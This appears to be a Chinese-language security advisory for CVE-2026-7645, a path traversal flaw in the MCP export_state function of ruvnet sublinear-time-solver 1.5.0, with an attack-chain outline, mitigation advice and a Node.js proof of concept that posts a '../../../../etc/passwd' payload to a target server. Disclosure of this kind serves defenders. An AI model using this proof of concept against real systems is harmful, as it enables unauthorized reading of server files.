CVE-2026-7645 CVSS 6.5 中危

CVE-2026-7645 sublinear-time-solver 路径遍历漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7645

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ruvnet sublinear-time-solver

漏洞概述

ruvnet sublinear-time-solver 1.5.0版本被发现存在路径遍历漏洞。该漏洞源于src/consciousness-explorer/mcp/server.js文件中的export_state函数未能正确过滤用户输入。攻击者无需用户交互即可远程利用此漏洞，可能导致系统完整性受损或文件被非法读取。目前公开的PoC已存在，但官方尚未发布修复补丁。

技术细节

该漏洞位于`ruvnet sublinear-time-solver`项目的`src/consciousness-explorer/mcp/server.js`脚本中，具体受影响的函数为`export_state`。该函数主要用于处理MCP（Model Context Protocol）接口的状态导出请求。在实现过程中，开发人员未对传入的路径参数进行严格的边界检查和规范化处理，导致攻击者可以注入路径遍历序列（如`../`）。由于CVSS评分显示无需任何权限（PR:N）且无用户交互（UI:N），攻击者可向受影响的服务端发送恶意构造的数据包。成功利用后，攻击者可能绕过目录限制，读写服务器上的敏感文件，尽管当前评分显示机密性影响为无，但完整性和可用性均受到低程度影响，表明存在数据篡改或服务中断的风险。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的ruvnet sublinear-time-solver服务（端口3000或默认MCP端口）。

STEP 2

武器化

攻击者构造包含路径遍历字符（如../）的JSON payload，旨在访问服务器文件系统根目录外的文件。

STEP 3

投递

攻击者向目标服务器的/export_state接口发送特制的HTTP POST请求。

STEP 4

利用

服务器端export_state函数未经验证直接处理恶意路径，导致文件系统访问权限被绕过。

STEP 5

影响

攻击者成功读取或修改受限文件，导致数据泄露（如果有权限）或服务完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-7645: Path Traversal in export_state
// Target: ruvnet sublinear-time-solver 1.5.0

const http = require('http');

const options = {
  hostname: 'TARGET_IP',
  port: 3000,
  path: '/mcp/export_state',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  }
};

// Payload containing path traversal sequence
const payload = JSON.stringify({
  file_path: '../../../../etc/passwd' 
});

const req = http.request(options, (res) => {
  console.log(`Status: ${res.statusCode}`);
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});

req.on('error', (e) => {
  console.error(e);
});

req.write(payload);
req.end();

影响范围

ruvnet sublinear-time-solver 1.5.0

防御指南

临时缓解措施

由于官方尚未修复，建议临时通过WAF（Web应用防火墙）规则拦截包含路径遍历特征的请求（如拦截URL或Body中包含'..'的请求）。同时，检查服务器日志是否已遭入侵扫描，并考虑在非必要情况下关闭MCP服务接口。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7645
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7645
3 Details https://www.cvedetails.com/cve/CVE-2026-7645/
4 VulDB https://vuldb.com/cve/CVE-2026-7645
5 Link https://github.com/ruvnet/sublinear-time-solver/
6 Link https://github.com/ruvnet/sublinear-time-solver/issues/19
7 Link https://vuldb.com/submit/806895
8 Link https://vuldb.com/vuln/360757
9 Link https://vuldb.com/vuln/360757/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表